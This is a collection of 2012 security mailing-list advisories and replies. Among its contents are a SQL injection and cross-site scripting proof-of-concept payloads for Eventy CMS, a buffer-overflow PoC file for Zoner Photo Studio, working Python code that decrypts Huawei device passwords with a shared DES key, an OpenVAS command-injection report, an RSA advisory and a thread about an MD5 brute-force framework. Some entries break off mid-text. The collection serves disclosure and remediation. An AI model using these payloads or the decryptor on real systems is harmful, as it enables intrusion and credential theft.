Eventy CMS v1.8 Plus - Multiple Web Vulnerablities
Title: == Eventy CMS v1.8 Plus - Multiple Web Vulnerablities Date: = 2012-11-13 References: === http://www.vulnerability-lab.com/get_content.php?id=756 VL-ID: = 756 Common Vulnerability Scoring System: 8.3 Introduction: = Publish Your Events In Online Calendar. Eventy Is Beautiful And Easy To Use Web Based Event Calendar Software Publish events like parties, courses, meetings, conferences, workshops, and more in easy and user-friendly way. Eventy Plus adds features like mailing lists, multi-administrator interface, switchable weekly/monthly view, event categories, and rich text editor. Use Eventy or Eventy Plus for your company website, freelancer`s blog, club site, online school, or to show your consulting availability. Eventy uses Ajax and runs on web hosts with PHP and MySQL. (Copy of the Vendor Homepage: http://calendarscripts.info/event-calendar-software.html ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in the Eventy CMS v1.8 Plus. Report-Timeline: 2012-11-13: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: A SQL Injection vulnerability is detected in the Eventy CMS v1.8 Plus ,web based event calendar software. The vulnerability allows an attacker (remote) or local low privileged user account to execute a SQL commands on the affected application dbms. The sql injection vulnerability is located in eventy.php file with the bound vulnerable event_id parameter. Successful exploitation of the vulnerability results in dbms application compromise. Exploitation requires no user interaction without privileged user account. Vulnerable File(s): [+] eventy.php Vulnerable Parameter(s): [+] event_id 1.2 A persistent input validation vulnerability is detected in the Eventy CMS v1.8 Plus ,web based event calendar software. The bug allows remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerabilities is located in the the add Event module bound vulnerable Event Title and Event Location parameters. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action privileged web application user account. Vulnerable Module(s): [+] Add Event Vulnerable Parameter(s): [+] Event Title - Event Location 1.3 A non-persistent cross site scripting vulnerability is detected in the Eventy CMS v1.8 Plus ,web based event calendar software. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user inter action or local low privileged user account. The vulnerability is located in the eventy.php page the bound vulnerable selyear and selmonth parameter. Successful exploitation of the vulnerability result in account steal, client site phishing or client-side content request manipulation. Vulnerable File(s): [+] eventy.php Vulnerable Parameter(s): [+] selyear - selmonth Proof of Concept: = 1.1 The SQL injection vulnerability can be exploited by remote attackers without privileged application user accounr and without required user inter action. For demonstration or reproduce ... PoC: htmlheadbody titleSQL Injection Vulnerability - PoC/title iframe src=http://eventy.127.0.0.1:8080/eventy/eventy.php?selyear=selmonth=event_id=-1869+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13--%20- /body/head/html 1.2 The persistent input validation vulnerabilities can be exploited by remote attackers with low or medium required user inter action low privileged user account. For demonstration or reproduce ... Manaually Reproduce ... The attacker can create a new event with injecting a malicious code i.e., iframe src=http://www.vulnerability-lab.com onload=alert(VL)/iframe, in the field Event Title - Event Location Fields. When the admin or any other user view the event the code gets executed. Reference(s): http://eventy.127.0.0.1:8080/eventy-plus/eve_edit.php?m=Novembery=2012d=20 1.3 PoC: htmlheadbody titleClient side - Cross Site Scripting/title iframe src=http://eventy.127.0.0.1:8080/eventy/eventy.php?selyear=selmonth=iframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%3C/iframe%3E iframe src=http://eventy.127.0.0.1:8080/eventy/eventy.php?selyear=iframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%3C/iframe%3Eselmonth=April /body/head/html Risk: = 1.1 The security risk of the remote SQL Injection vulnerability is estimated as
Weak password encryption on Huawei products
Weak password encryption on Huawei products === [ADVISORY INFORMATION] Title: Weak password encryption on Huawei products Release date: 13/11/2012 Credits:Roberto Paleari, Emaze Networks (roberto.pale...@emaze.net) Ivan Speziale, Emaze Networks (ivan.spezi...@emaze.net) [VULNERABILITY INFORMATION] Class: Information disclosure [AFFECTED PRODUCTS] We confirm the presence of this security vulnerability on the following products: * Huawei Quidway series * Huawei CX600 Other models are probably also vulnerable, but they were not checked. [VULNERABILITY DETAILS] Huawei devices support a weak password encryption algorithm. With this scheme, passwords are obfuscated and encrypted with DES, using an encryption key shared among all the affected devices. This encryption scheme does not use any password salting mechanism. As a consequence, passwords extracted from a victim's device can be deciphered instantaneously. A Python procedure that decodes a given password is included below. Upon termination, procedure decrypt_password() returns the clear-text password. cut from Crypto.Cipher import DES def decode_char(c): if c == 'a': r = '?' else: r = c return ord(r) - ord('!') def ascii_to_binary(s): assert len(s) == 24 out = [0]*18 i = 0 j = 0 for i in range(0, len(s), 4): y = decode_char(s[i + 0]) y = (y 6) 0xff k = decode_char(s[i + 1]) y = (y | k) 0xff y = (y 6) 0xff k = decode_char(s[i + 2]) y = (y | k) 0xff y = (y 6) 0xff k = decode_char(s[i + 3]) y = (y | k) 0xff out[j+2] = chr(y0xff) out[j+1] = chr((y8) 0xff) out[j+0] = chr((y16) 0xff) j += 3 return .join(out) def decrypt_password(p): r = ascii_to_binary(p) r = r[:16] d = DES.new(\x01\x02\x03\x04\x05\x06\x07\x08, DES.MODE_ECB) r = d.decrypt(r) return r.rstrip(\x00) /cut [REMEDIATION] We recommend to store passwords using a proper hashing algorithm, instead of leveraging symmetric encryption. At the moment, this issue has been addressed by Huawei with security advisory Huawei-SA-20120827-01-CX600 (Updated Security Advisory on the Risk of Password Being Cracked Due to DES Encryption Algorithm). Further details are available at the following URL: http://support.huawei.com/enterprise/ReadLatestNewsAction.action?contentId=NEWS101141 [COPYRIGHT] Copyright(c) Emaze Networks S.p.A 2012, All rights reserved worldwide. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact. [DISCLAIMER] Emaze Networks S.p.A is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.
[OVSA20121112] OpenVAS Manager Vulnerable To Command Injection
Summary It has been identified that OpenVAS Manager is vulnerable to command injection due to insufficient validation of user supplied data when processing OMP requests. It has been identified that this vulnerability may allow arbitrary code to be executed with the privileges of the OpenVAS Manager on vulnerable systems. CVE-2012-5520 has been assigned to this vulnerability. Current Status As of the 20th January 2011, the state of the vulnerabilities is believed to be as follows. A patch has been supplied by Greenbone Networks which it successfully resolves this vulnerability. New releases of both 3.0.x and 4.0.x have also been created which incorporate this patch. Thanks OpenVAS would like to thank Andre Heinecke of Greenbone Networks for his help in reporting the vulnerability. -- Tim Brown mailto:timb@openvas,org http://www.openvas.org/ OpenVAS Security Advisory (OVSA20121112) Date: 12th November 2012 Product: OpenVAS Manager 3.0.4 and 4.0+beta4 Vendor: OpenVAS http://www.openvas.org/ Risk: Medium Summary It has been identified that OpenVAS Manager is vulnerable to command injection due to insufficient validation of user supplied data when processing OMP requests. It has been identified that this vulnerability may allow arbitrary code to be executed with the privileges of the OpenVAS Manager on vulnerable systems. CVE-2012-5520 has been assigned to this vulnerability. Current Status As of the 20th January 2011, the state of the vulnerabilities is believed to be as follows. A patch has been supplied by Greenbone Networks which it successfully resolves this vulnerability. New releases of both 3.0.x and 4.0.x have also been created which incorporate this patch. Technical Details It has been identified that OpenVAS Manager is vulnerable to command injection due to insufficient validation of user supplied data when sending reports to a Sourcefire Defense Center. The processing of requests containing malicious values for the ip address or port causes the command below to be executed with the privileges of the OpenVAS Manager (typically root) using the send_to_sourcefire() function from manage_sql.c: command = g_strdup_printf (/bin/sh %s %s %s %s %s /dev/null 2 /dev/null, script, ip, port, pkcs12_file, report_file); ... if (ret = system (command)... As you can see, an attacker can influence both the ip address and port within the concatenated string. The vulnerable code path is only accessible to authenticated users of OpenVAS Manager. Fix OpenVAS recommends that the publicly available patches are applied. If building from source, then either patch r14404, r14405 and r14421 (trunk) or r14437 (3.0.x) should be obtained from the OpenVAS SVN repository. A fresh tarball containing the latest stable release can be obtained from: * http://wald.intevation.org/frs/download.php/1212/openvas-manager-3.0.4.tar.gz In the event that OpenVAS has been supplied as part of a distribution then the vendor or organisation concerned should be contacted for a patch. History On the 7th November 2012, Greenbone Networks contacted the OpenVAS security team to notify them of the vulnerability and request assistance in coordinating the disclosure. OpenVAS Manager 3.0.4 was released on the 7th. The OpenVAS security team and Greenbone Networks opened a dialogue in order to draft this advisory and on the 12th November, CVE-2012-5520 was assigned for this vulnerability. Thanks OpenVAS would like to thank Andre Heinecke of Greenbone Networks for his help in reporting the vulnerability. signature.asc Description: This is a digitally signed message part.
Zoner Photo Studio v15 b3 - Buffer Overflow Vulnerabilities
Title: == Zoner Photo Studio v15 b3 - Buffer Overflow Vulnerabilities Date: = 2012-11-13 References: === http://www.vulnerability-lab.com/get_content.php?id=759 VL-ID: = 759 Common Vulnerability Scoring System: 4.5 Introduction: = Mit dem Bildverwalter `Zoner PhotoStudio` sammeln Sie Ihre digitalen Fotos unter einer Oberfläche. Die übersichtliche Benutzeroberfläche von `Zoner PhotoStudio` und der große Funktionsumfang machen es Ihnen einfach, Ihre Bilder zu verschönern und mit Freunden zu teilen. Eines der Highlights der Software ist die Möglichkeit, eigene 3D-Bilder zu entwerfen. Die fertigen Fotos können mit einer handelsüblichen 3D-Brille dreidimensional bestaunt werden. Weiter können Sie Diashows anlegen, Ihre Bilder im Internet veröffentlichen oder Panorama-Fotos erstellen, wobei Ihnen das Programm ganz unkompliziert unter die Arme greift. (Copy of the Homepage: http://www.zoner.com/de-de/download-photo-studio-free ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple Buffer Overflow Vulnerabilities in the official Zoner Photo Studio Software v15 (b3). Report-Timeline: 2012-11-13: Public Disclosure Status: Published Affected Products: == Zoner Software Product: Zoner Photo Studio v15 Build 3 Exploitation-Technique: === Local Severity: = High Details: Multiple local buffer overflow vulnerabilities are detected in the in the official Zoner Photo Studio Software v15 (b3). The bug allows local attackers to escalate out of the affected vulnerable software module with system process privileges. The vulnerabilities are detected in 2 different software functions of the main executeable (zps.exe). 1.1 The first local buffer overflow vulnerability is located in the XML `Keyword Import (Schlüsselwort)` module. The xml importer does not parse the length (values) of the string (name description) when processing to import (buffer). The result is a local exploitable stack-based Buffer Overflow vulnerability. Vulnerable Module(s): [+] Setting(Einstellungen) Keyword XML Import/Export (ZPS14Keywords.xml) Vulnerable Parameter(s): [+] Name [+] Description 1.2 The secound vulnerability is located in the `Publizieren Per Mail versenden` (STRG+UMS+M) module. The module allows an local user to publish .zip compressed files. The archivname field does not filter or sanitize large inputs when processing to load (buffer) the compressed file name extensions. The result is a local exploitable stack-based Buffer Overflow vulnerability. Vulnerable Module(s): [+] Publizieren Per Mail versenden [Zip Comprimierung der Bilder] Vulnerable Parameter(s): [+] Archivname Proof of Concept: = 1.1 The buffer overflow vulnerability can be exploited by local attackers with local privileged system user account and without required user inter action. For demonstration or reproduce ... PoC: [XML] ZPS14Keywords.xml | Setting(Einstellungen) Keyword Import/Export ?php header('Content-Type: text/xml'); print '?xml version=1.0 encoding=UTF-8?keywords version=2.0hierarchy keyword category=yes name=Security Researchers keyword category=no name=[BUFFER OVERFLOW (EIPEBX) VIA IMPORT KEYWORDS!]; description=31337; / keyword category=no name=Benjamin Kunz Mejri / keyword category=no name=PenTest23 / keyword category=no name=PenTest24 / keyword category=no name=PenTest25 / keyword category=no name=PenTest26 / keyword category=no name=PenTest26 / keyword category=no name=PenTest27 / keyword category=no name=PenTest28 / keyword category=no name=PenTest29 / keyword category=no name=PenTest30 / /keyword keyword category=yes name=News keyword category=no name=31337; description=[BUFFER OVERFLOW (EIPEBX) VIA IMPORT KEYWORDS!]; / keyword category=no name=Chokri Ben Achour / keyword category=no name=PenTest32 / keyword category=no name=PenTest33 / keyword category=no name=PenTest34 / keyword category=no name=PenTest35 / keyword category=no name=PenTest36 / keyword category=no name=PenTest37 / keyword category=no name=PenTest38 / keyword category=no name=PenTest39 / keyword
Re: [OVSA20121112] OpenVAS Manager Vulnerable To Command Injection
Doh, a document gets proof read by multiple people and yet it contains a mistake. In the Current Status section of the advisory, the date is incorrect. A corrected advisory is attached. Tim -- Tim Brown mailto:timb@openvas,org http://www.openvas.org/ OpenVAS Security Advisory (OVSA20121112) Date: 12th November 2012 Product: OpenVAS Manager 3.0.4 and 4.0+beta4 Vendor: OpenVAS http://www.openvas.org/ Risk: Medium Summary It has been identified that OpenVAS Manager is vulnerable to command injection due to insufficient validation of user supplied data when processing OMP requests. It has been identified that this vulnerability may allow arbitrary code to be executed with the privileges of the OpenVAS Manager on vulnerable systems. CVE-2012-5520 has been assigned to this vulnerability. Current Status As of the 12th November, the state of the vulnerabilities is believed to be as follows. A patch has been supplied by Greenbone Networks which it successfully resolves this vulnerability. New releases of both 3.0.x and 4.0.x have also been created which incorporate this patch. Technical Details It has been identified that OpenVAS Manager is vulnerable to command injection due to insufficient validation of user supplied data when sending reports to a Sourcefire Defense Center. The processing of requests containing malicious values for the ip address or port causes the command below to be executed with the privileges of the OpenVAS Manager (typically root) using the send_to_sourcefire() function from manage_sql.c: command = g_strdup_printf (/bin/sh %s %s %s %s %s /dev/null 2 /dev/null, script, ip, port, pkcs12_file, report_file); ... if (ret = system (command)... As you can see, an attacker can influence both the ip address and port within the concatenated string. The vulnerable code path is only accessible to authenticated users of OpenVAS Manager. Fix OpenVAS recommends that the publicly available patches are applied. If building from source, then either patch r14404, r14405 and r14421 (trunk) or r14437 (3.0.x) should be obtained from the OpenVAS SVN repository. A fresh tarball containing the latest stable release can be obtained from: * http://wald.intevation.org/frs/download.php/1212/openvas-manager-3.0.4.tar.gz In the event that OpenVAS has been supplied as part of a distribution then the vendor or organisation concerned should be contacted for a patch. History On the 7th November 2012, Greenbone Networks contacted the OpenVAS security team to notify them of the vulnerability and request assistance in coordinating the disclosure. OpenVAS Manager 3.0.4 was released on the 7th. The OpenVAS security team and Greenbone Networks opened a dialogue in order to draft this advisory and on the 12th November, CVE-2012-5520 was assigned for this vulnerability. Thanks OpenVAS would like to thank Andre Heinecke of Greenbone Networks for his help in reporting the vulnerability. signature.asc Description: This is a digitally signed message part.
ESA-2012-055: RSA® Data Protection Manager Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ESA-2012-055: RSA® Data Protection Manager Multiple Vulnerabilities EMC Identifier: ESA-2012-055 CVE Identifier: CVE-2012-4612, CVE-2012-4613 Severity Rating: See below for individual scores and refer vendor advisories for component issues Affected Products: RSA Data Protection Manager Appliance 3.x (Virtual and Hardware) RSA Data Protection Manager Software Server 3.x RSA Data Protection Manager Appliance 2.7.x RSA Data Protection Manager Software Server 2.7.x Summary: RSA Data Protection Manager is susceptible to vulnerabilities that could potentially be exploited by malicious users to compromise affected systems. Details: RSA Data Protection Manager is susceptible to multiple vulnerabilities that could be potentially exploited by malicious users to compromise the affected systems. The vulnerabilities are: Cross-site scripting (XSS) vulnerability (CVE-2012-4612) CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) Improper restriction of authentication attempts for OS lever user accounts (CVE-2012-4613) CVSS v2 Base Score: 6.9 (AV:L/AC:M/Au:N/C:C/I:C/A:C). Note: This issue only affects RSA Data Protection Manager Appliance (Virtual and Hardware) This hot fix also updates multiple embedded components within the RSA Data Protection Manager Appliance and Virtual Appliance to address security vulnerabilities and other generic bugs. Refer to release notes for more details. Recommendation: RSA strongly recommends all customers to upgrade to RSA Data Protection Manager 3.2.1 at the earliest opportunity. Severity Rating: For an explanation of Severity Ratings, refer to the Knowledge Base Article, Security Advisories Severity Rating at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. Obtaining Downloads: To request your upgrade of the software, please call your local support telephone number (contact phone numbers are available at http://www.rsa.com/node.aspx?id=1356) for most expedient service. You may also request your software upgrade online at http://www.rsa.com/go/form_ins.asp Obtaining Documentation: To obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link. Obtaining More Information: For more information about RSA Data Protection Manager, visit the RSA web site at http://www.rsa.com/node.aspx?id=1203. Getting Support and Service: For customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab. General Customer Support Information: http://www.rsa.com/node.aspx?id=1264 RSA SecurCare Online: https://knowledge.rsasecurity.com EOPS Policy: RSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details. http://www.rsa.com/node.aspx?id=2575 SecurCare Online Security Advisories RSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided as is without warranty of any kind. RSA disclaim all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. About RSA SecurCare Notes Security Advisories Subscription RSA SecurCare Notes Security Advisories are targeted e-mail messages that RSA sends you based on the RSA product family you currently use. If youd like to stop receiving RSA SecurCare Notes Security Advisories, or if youd like to change which RSA product family Notes Security Advisories you currently receive, log on to RSA SecurCare Online
Re: Wisecracker 1.0 - A high performance distributed cryptanalysis framework
On Mon, Nov 05, 2012 at 03:56:21PM -0500, Vikas N Kumar wrote: Wisecracker is an open source high performance distributed cryptanalysis framework that leverages GPUs and multiple CPUs. It allows security researchers to write their own cryptanalysis tools that can distribute brute-force cryptanalysis work across multiple systems with multiple multi-core processors and GPUs. Security researchers can also use the sample tools provided out-of-the-box. The differentiating aspect of Wisecracker is that it uses OpenCL and MPI together to distribute the work across multiple systems, each having multiple CPUs and/or GPUs. As an example an MD5 reversing for 6-8 character strings is provided. More information including source code, technical papers and API documentation can be found at http://selectiveintellect.com/wisecracker.html Thanks. Developers @ Selective Intellect LLC. http://selectiveintellect.com I don't think this statement on your website makes much sense: A user can download Wisecracker™ on a GPU cluster virtual machine provided by Amazon EC2® and reverse an MD5 cryptographic hash for a 6 character password in about 20 minutes if using 1 virtual machine or in about 3 minutes if using 2 or more. What does 2 or more mean here? If I use two machines in parallel, that's more than six times as fast as only using one machine? Seems weird to me. signature.asc Description: Digital signature
Re: Wisecracker 1.0 - A high performance distributed cryptanalysis framework
On Sat, Nov 10, 2012 at 9:45 AM, Jann Horn jannh...@googlemail.com wrote: I don't think this statement on your website makes much sense: A user can download Wisecracker™ on a GPU cluster virtual machine provided by Amazon EC2® and reverse an MD5 cryptographic hash for a 6 character password in about 20 minutes if using 1 virtual machine or in about 3 minutes if using 2 or more. What does 2 or more mean here? If I use two machines in parallel, that's more than six times as fast as only using one machine? Seems weird to me. Hi I have actually updated the white paper with more clarity on that statement. The time of 3 minutes is not the time taken to generate hashes for all the possibilities. It is the average time taken to hit upon the first successful solution. Once you get the solution the software sends a stop signal to stop computation. This is part of the MD5 example though, and the framework API is more generic and allows the user to design the problem however they want. The framework's advantage is the communications between systems and task distribution. Wisecracker uses a concept of tasks for distribution of work load across processors (CPUs, GPUs). The algorithm is a divide and conquer algorithm similar to bucket sort and quick sort. So if you want to reverse an MD5 sum into a 6-character string of all printable ASCII characters (94 of them) that would be about 94^6 which is approximately 690 billion combinations. Wisecracker internally creates an index based handling of these tasks. Each task is just an index, and each index will end up being a string of 6-characters based on which combination in the 94^6 it represents. (You can refer to the md5.cl OpenCL file to see how it is done). However, when more than 1 system is used the tasks get distributed per system based on each system's OpenCL capabilities based on compute units and work group size. Amazon's VMs have 2 GPUs each. When a single system is being used the tasks are distributed in the range [1, 690billion] between 2 GPUs based on the product of the compute units and workgroup size. So if a GPU's compute units are 32 in number and have a work group size of 2048, it gets 32 x 2048 task blocks to work on. So one by one each GPU will keep computing on it successive task blocks that it is given until it finds the solution. When you use 2 systems, the tasks are distributed between each system as the ranges [1, 345billion] and [345billion, 690billion]. Once each system gets its task range, it distributes work between its GPUs in a similar fashion as task blocks based on compute units and work group size. Let's say you want to recover the string 'z@bD1g' and it might be in the index range [345billion - 690billion]. If you were to run this on 1 Amazon GPU VM the program will have to compute for [1-345billion] range first and then get to the [345billion-690billion] range. However, if you distribute this on 2 VMs you will hit upon the solution faster because the second system is starting from 345billion and you might not need to compute all the 345billion possible values on each VM. You are saved from the needless computation of the [1-345billion] range in full as done in the single system operation. Hence the 2 VMs give a bigger decline in time rather than 1 VM because of the way the work is distributed for the MD5 example. On an average with different sets of strings the runtime drastically goes down because of the fact that the search buckets are smaller and start at different points. The task distribution is a divide and conquer algorithm and does have a worst case scenario run value of 10 minutes for a 6-character string if the string is the 345billionth or 690billionth possibility. But more often than not you will see an average run value of 3 minutes to find the solution string. I shall correct the ambiguous message on the website. Thanks Vikas Selective Intellect LLC